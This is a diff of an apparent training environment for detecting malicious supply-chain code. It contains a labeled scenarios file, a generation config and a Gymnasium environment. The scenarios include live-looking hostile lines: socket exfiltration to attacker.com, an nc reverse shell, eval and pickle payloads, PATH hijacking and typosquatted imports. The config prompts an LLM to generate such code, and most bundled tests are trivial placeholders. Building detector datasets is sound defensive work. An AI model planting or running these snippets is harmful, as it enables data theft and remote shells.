| 139 |
+
"source": "mutation_engine",
|
| 140 |
+
"attack_type": "env_hijack"
|
| 141 |
+
},
|
| 142 |
+
{
|
| 143 |
+
"id": "tp_4112a517",
|
| 144 |
+
"type": "true_positive",
|
| 145 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 146 |
+
"patch": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 147 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 148 |
+
"label": "malicious",
|
| 149 |
+
"source": "mutation_engine",
|
| 150 |
+
"attack_type": "socket_exfil"
|
| 151 |
+
},
|
| 152 |
+
{
|
| 153 |
+
"id": "fp_1a5da2e5",
|
| 154 |
+
"type": "false_positive",
|
| 155 |
+
"code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 156 |
+
"patch": null,
|
| 157 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 158 |
+
"label": "benign",
|
| 159 |
+
"source": "mutation_engine",
|
| 160 |
+
"attack_type": null
|
| 161 |
+
},
|
| 162 |
+
{
|
| 163 |
+
"id": "tp_3fa65759",
|
| 164 |
+
"type": "true_positive",
|
| 165 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 166 |
+
"patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 167 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 168 |
+
"label": "malicious",
|
| 169 |
+
"source": "mutation_engine",
|
| 170 |
+
"attack_type": "socket_exfil"
|
| 171 |
+
},
|
| 172 |
+
{
|
| 173 |
+
"id": "fn_c40125ae",
|
| 174 |
+
"type": "functional",
|
| 175 |
+
"code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 176 |
+
"patch": null,
|
| 177 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 178 |
+
"label": "benign",
|
| 179 |
+
"source": "mutation_engine",
|
| 180 |
+
"attack_type": null
|
| 181 |
+
},
|
| 182 |
+
{
|
| 183 |
+
"id": "tp_7ac28ccc",
|
| 184 |
+
"type": "true_positive",
|
| 185 |
+
"code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 186 |
+
"patch": "def format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 187 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 188 |
+
"label": "malicious",
|
| 189 |
+
"source": "mutation_engine",
|
| 190 |
+
"attack_type": "eval_hidden"
|
| 191 |
+
},
|
| 192 |
+
{
|
| 193 |
+
"id": "tp_e1848067",
|
| 194 |
+
"type": "true_positive",
|
| 195 |
+
"code_snippet": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 196 |
+
"patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 197 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 198 |
+
"label": "malicious",
|
| 199 |
+
"source": "mutation_engine",
|
| 200 |
+
"attack_type": "pickle_deserialization"
|
| 201 |
+
},
|
| 202 |
+
{
|
| 203 |
+
"id": "fp_382449d8",
|
| 204 |
+
"type": "false_positive",
|
| 205 |
+
"code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 206 |
+
"patch": null,
|
| 207 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 208 |
+
"label": "benign",
|
| 209 |
+
"source": "mutation_engine",
|
| 210 |
+
"attack_type": null
|
| 211 |
+
},
|
| 212 |
+
{
|
| 213 |
+
"id": "fp_5448737e",
|
| 214 |
+
"type": "false_positive",
|
| 215 |
+
"code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 216 |
+
"patch": null,
|
| 217 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 218 |
+
"label": "benign",
|
| 219 |
+
"source": "mutation_engine",
|
| 220 |
+
"attack_type": null
|
| 221 |
+
},
|
| 222 |
+
{
|
| 223 |
+
"id": "tp_067c7620",
|
| 224 |
+
"type": "true_positive",
|
| 225 |
+
"code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 226 |
+
"patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 227 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 228 |
+
"label": "malicious",
|
| 229 |
+
"source": "mutation_engine",
|
| 230 |
+
"attack_type": "malicious_import"
|
| 231 |
+
},
|
| 232 |
+
{
|
| 233 |
+
"id": "tp_30239b19",
|
| 234 |
+
"type": "true_positive",
|
| 235 |
+
"code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 236 |
+
"patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 237 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 238 |
+
"label": "malicious",
|
| 239 |
+
"source": "mutation_engine",
|
| 240 |
+
"attack_type": "malicious_import"
|
| 241 |
+
},
|
| 242 |
+
{
|
| 243 |
+
"id": "fn_cf514ff8",
|
| 244 |
+
"type": "functional",
|
| 245 |
+
"code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
|
| 246 |
+
"patch": null,
|
| 247 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 248 |
+
"label": "benign",
|
| 249 |
+
"source": "mutation_engine",
|
| 250 |
+
"attack_type": null
|
| 251 |
+
},
|
| 252 |
+
{
|
| 253 |
+
"id": "tp_b9c23fd5",
|
| 254 |
+
"type": "true_positive",
|
| 255 |
+
"code_snippet": "import pythonn\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 256 |
+
"patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 257 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 258 |
+
"label": "malicious",
|
| 259 |
+
"source": "mutation_engine",
|
| 260 |
+
"attack_type": "typosquatting"
|
| 261 |
+
},
|
| 262 |
+
{
|
| 263 |
+
"id": "tp_18963f71",
|
| 264 |
+
"type": "true_positive",
|
| 265 |
+
"code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 266 |
+
"patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 267 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 268 |
+
"label": "malicious",
|
| 269 |
+
"source": "mutation_engine",
|
| 270 |
+
"attack_type": "eval_hidden"
|
| 271 |
+
},
|
| 272 |
+
{
|
| 273 |
+
"id": "tp_4c4f927a",
|
| 274 |
+
"type": "true_positive",
|
| 275 |
+
"code_snippet": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 276 |
+
"patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 277 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 278 |
+
"label": "malicious",
|
| 279 |
+
"source": "mutation_engine",
|
| 280 |
+
"attack_type": "subprocess_backdoor"
|
| 281 |
+
},
|
| 282 |
+
{
|
| 283 |
+
"id": "tp_4ea9d228",
|
| 284 |
+
"type": "true_positive",
|
| 285 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 286 |
+
"patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 287 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 288 |
+
"label": "malicious",
|
| 289 |
+
"source": "mutation_engine",
|
| 290 |
+
"attack_type": "env_hijack"
|
| 291 |
+
},
|
| 292 |
+
{
|
| 293 |
+
"id": "tp_f417c9df",
|
| 294 |
+
"type": "true_positive",
|
| 295 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
|
| 296 |
+
"patch": "def is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
|
| 297 |
+
"unit_test_code": "import code\nassert code.is_prime(7) == True\n",
|
| 298 |
+
"label": "malicious",
|
| 299 |
+
"source": "mutation_engine",
|
| 300 |
+
"attack_type": "env_hijack"
|
| 301 |
+
},
|
| 302 |
+
{
|
| 303 |
+
"id": "tp_bde0820e",
|
| 304 |
+
"type": "true_positive",
|
| 305 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
|
| 306 |
+
"patch": "def parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
|
| 307 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 308 |
+
"label": "malicious",
|
| 309 |
+
"source": "mutation_engine",
|
| 310 |
+
"attack_type": "env_hijack"
|
| 311 |
+
},
|
| 312 |
+
{
|
| 313 |
+
"id": "fn_d6a7e145",
|
| 314 |
+
"type": "functional",
|
| 315 |
+
"code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
|
| 316 |
+
"patch": null,
|
| 317 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 318 |
+
"label": "benign",
|
| 319 |
+
"source": "mutation_engine",
|
| 320 |
+
"attack_type": null
|
| 321 |
+
},
|
| 322 |
+
{
|
| 323 |
+
"id": "tp_69568e28",
|
| 324 |
+
"type": "true_positive",
|
| 325 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 326 |
+
"patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 327 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 328 |
+
"label": "malicious",
|
| 329 |
+
"source": "mutation_engine",
|
| 330 |
+
"attack_type": "socket_exfil"
|
| 331 |
+
},
|
| 332 |
+
{
|
| 333 |
+
"id": "fn_7abd4b1e",
|
| 334 |
+
"type": "functional",
|
| 335 |
+
"code_snippet": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 336 |
+
"patch": null,
|
| 337 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 338 |
+
"label": "benign",
|
| 339 |
+
"source": "mutation_engine",
|
| 340 |
+
"attack_type": null
|
| 341 |
+
},
|
| 342 |
+
{
|
| 343 |
+
"id": "fp_56b026a4",
|
| 344 |
+
"type": "false_positive",
|
| 345 |
+
"code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef parse_logs(log_lines):\n \"\"\"Parse simple log lines into level and message.\"\"\"\n parsed = []\n for line in log_lines:\n parts = line.split(' - ', 1)\n if len(parts) == 2:\n parsed.append({\"level\": parts[0].strip('[]'), \"message\": parts[1]})\n return parsed",
|
| 346 |
+
"patch": null,
|
| 347 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 348 |
+
"label": "benign",
|
| 349 |
+
"source": "mutation_engine",
|
| 350 |
+
"attack_type": null
|
| 351 |
+
},
|
| 352 |
+
{
|
| 353 |
+
"id": "fn_9691b992",
|
| 354 |
+
"type": "functional",
|
| 355 |
+
"code_snippet": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 356 |
+
"patch": null,
|
| 357 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 358 |
+
"label": "benign",
|
| 359 |
+
"source": "mutation_engine",
|
| 360 |
+
"attack_type": null
|
| 361 |
+
},
|
| 362 |
+
{
|
| 363 |
+
"id": "fp_477c7ba9",
|
| 364 |
+
"type": "false_positive",
|
| 365 |
+
"code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 366 |
+
"patch": null,
|
| 367 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 368 |
+
"label": "benign",
|
| 369 |
+
"source": "mutation_engine",
|
| 370 |
+
"attack_type": null
|
| 371 |
+
},
|
| 372 |
+
{
|
| 373 |
+
"id": "fp_f65258dd",
|
| 374 |
+
"type": "false_positive",
|
| 375 |
+
"code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef celsius_to_fahrenheit(c):\n \"\"\"Convert Celsius to Fahrenheit.\"\"\"\n return (c * 9/5) + 32\n\ndef fahrenheit_to_celsius(f):\n \"\"\"Convert Fahrenheit to Celsius.\"\"\"\n return (f - 32) * 5/9",
|
| 376 |
+
"patch": null,
|
| 377 |
+
"unit_test_code": "import code\nassert code.celsius_to_fahrenheit(0) == 32\n",
|
| 378 |
+
"label": "benign",
|
| 379 |
+
"source": "mutation_engine",
|
| 380 |
+
"attack_type": null
|
| 381 |
+
},
|
| 382 |
+
{
|
| 383 |
+
"id": "fn_7ed224be",
|
| 384 |
+
"type": "functional",
|
| 385 |
+
"code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 386 |
+
"patch": null,
|
| 387 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 388 |
+
"label": "benign",
|
| 389 |
+
"source": "mutation_engine",
|
| 390 |
+
"attack_type": null
|
| 391 |
+
},
|
| 392 |
+
{
|
| 393 |
+
"id": "tp_6523f26b",
|
| 394 |
+
"type": "true_positive",
|
| 395 |
+
"code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 396 |
+
"patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 397 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 398 |
+
"label": "malicious",
|
| 399 |
+
"source": "mutation_engine",
|
| 400 |
+
"attack_type": "eval_hidden"
|
| 401 |
+
}
|
| 402 |
+
]
|
sentinel_synth/data/sdk_config.yaml
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Meta Synthetic Data Kit Configuration for Sentinel-Synth
|
| 2 |
+
# This file defines how the SDK should generate synthetic vulnerabilities.
|
| 3 |
+
|
| 4 |
+
vllm:
|
| 5 |
+
api_base: "http://localhost:8000/v1"
|
| 6 |
+
model: "meta-llama/Llama-3.1-8B-Instruct"
|
| 7 |
+
|
| 8 |
+
generation:
|
| 9 |
+
temperature: 0.8
|
| 10 |
+
top_p: 0.95
|
| 11 |
+
max_tokens: 1024
|
| 12 |
+
num_pairs: 5 # Number of examples per ingest chunk
|
| 13 |
+
|
| 14 |
+
prompts:
|
| 15 |
+
# Standard prompt for generating malicious supply-chain code
|
| 16 |
+
code_generation: |
|
| 17 |
+
You are a cybersecurity research assistant specializing in supply-chain security.
|
| 18 |
+
Generate a Python script that contains a subtle, realistic supply-chain vulnerability.
|
| 19 |
+
The vulnerability should be one of:
|
| 20 |
+
- Typosquatting (importing a malicious package similar to a popular one)
|
| 21 |
+
- Obfuscated execution (exec/eval with base64/zlib encoding)
|
| 22 |
+
- Environment hijacking (modifying PATH or other critical env vars)
|
| 23 |
+
- Subprocess backdoors (reverse shells or hidden command execution)
|
| 24 |
+
- Malicious __import__ tricks
|
| 25 |
+
|
| 26 |
+
After the code, provide a 'patch' that fixes the vulnerability without breaking functionality.
|
| 27 |
+
Also, provide a 'unit_test_code' that fails on the malicious version but passes on the patched version.
|
| 28 |
+
|
| 29 |
+
Format the output as a JSON object with keys:
|
| 30 |
+
- code_snippet: the vulnerable code
|
| 31 |
+
- patch: the fixed code
|
| 32 |
+
- unit_test_code: the validation test
|
| 33 |
+
- attack_type: the category of the attack
|
sentinel_synth/envs/__init__.py
ADDED
|
File without changes
|
sentinel_synth/envs/sentinel_env.py
ADDED
|
@@ -0,0 +1,175 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import gymnasium as gym
|
| 2 |
+
from gymnasium import spaces
|
| 3 |
+
import json
|
| 4 |
+
import numpy as np
|
| 5 |
+
from pathlib import Path
|
| 6 |
+
import random
|
| 7 |
+
|
| 8 |
+
from ..validation.docker_runner import run_code
|
| 9 |
+
from ..validation.patch_validator import validate_patch
|
| 10 |
+
|
| 11 |
+
class SentinelEnv(gym.Env):
    """
    Gymnasium environment for Sentinel-Synth.

    Each episode presents a single scenario dict (read keys: ``code_snippet``,
    ``label``, ``type`` and optionally ``patch``) and lets the agent choose one
    of five discrete actions. ``ACTION_ANALYZE`` and ``ACTION_EXECUTE_SANDBOX``
    yield a small reward and keep the episode running; ``ACTION_BLOCK_PR``,
    ``ACTION_SUBMIT_PATCH`` and ``ACTION_REQUEST_REVIEW`` end it. An episode is
    also ended (with a penalty) once ``max_steps`` steps have been taken.
    """
    metadata = {"render_modes": ["human"]}

    ACTION_ANALYZE = 0
    ACTION_EXECUTE_SANDBOX = 1
    ACTION_BLOCK_PR = 2
    ACTION_SUBMIT_PATCH = 3
    ACTION_REQUEST_REVIEW = 4

    # Substrings that raise each static flag, listed in flag-index order.
    _STATIC_FLAG_MARKERS = (
        ("eval(", "exec("),
        ("subprocess", "os.system"),
        ("socket", "requests"),
        ("os.environ",),
        ("base64", "zlib"),
    )

    def __init__(self, scenarios_path="sentinel_synth/data/scenarios.json", use_docker=False):
        """
        Args:
            scenarios_path: Path of the JSON file holding the scenario list.
            use_docker: Forwarded to ``run_code`` / ``validate_patch``.
        """
        super().__init__()

        self.use_docker = use_docker
        self.scenarios_path = scenarios_path
        self.scenarios = self._load_scenarios()

        self.current_scenario = None
        self.step_counter = 0
        self.max_steps = 5
        # Initialised here (not only in reset) so render() is safe at any time.
        self.last_action = None
        self.last_reward = 0

        # Define Observation Space
        # text max length 5000 chars
        self.observation_space = spaces.Dict(
            {
                "code_snippet": spaces.Text(max_length=5000, charset="".join(gym.spaces.text.alphanumeric) + " \n\t\r!@#$%^&*()_+-=[]{}|;':\",.<>/?\\"),
                "static_flags": spaces.Box(low=0, high=1, shape=(5,), dtype=np.int32),
                "risk_score": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
            }
        )

        # Define Action Space
        self.action_space = spaces.Discrete(5)

    def _load_scenarios(self):
        """Return the parsed scenario file, or ``[]`` (with a warning) on any failure."""
        try:
            with open(self.scenarios_path, "r", encoding="utf-8") as f:
                return json.load(f)
        except Exception as e:
            # Deliberate best-effort: reset() falls back to a built-in scenario.
            print(f"Warning: Could not load scenarios from {self.scenarios_path}: {e}")
            return []

    def _compute_static_flags(self, code_snippet: str):
        """Return a length-5 int32 vector; entry i is 1 if any marker of group i occurs."""
        flags = np.zeros(5, dtype=np.int32)
        for index, markers in enumerate(self._STATIC_FLAG_MARKERS):
            if any(marker in code_snippet for marker in markers):
                flags[index] = 1
        return flags

    def _get_obs(self):
        """Build the observation dict for the current scenario."""
        # truncate code to 5000 chars to fit text space
        code = self.current_scenario["code_snippet"][:5000]

        flags = self._compute_static_flags(code)
        # Risk score is simply the fraction of static flags that fired.
        risk_score = np.array([np.sum(flags) / 5.0], dtype=np.float32)

        return {
            "code_snippet": code,
            "static_flags": flags,
            "risk_score": risk_score
        }

    def reset(self, seed=None, options=None):
        """
        Start a new episode.

        Args:
            seed: Forwarded to ``gym.Env.reset``; it seeds ``self.np_random``,
                which is what selects the scenario, so a seed makes the
                selection reproducible.
            options: Optional dict; ``options["scenario"]`` forces a specific
                scenario dict instead of a random one.

        Returns:
            ``(observation, info)`` where ``info`` is an empty dict.
        """
        super().reset(seed=seed)

        if options and "scenario" in options:
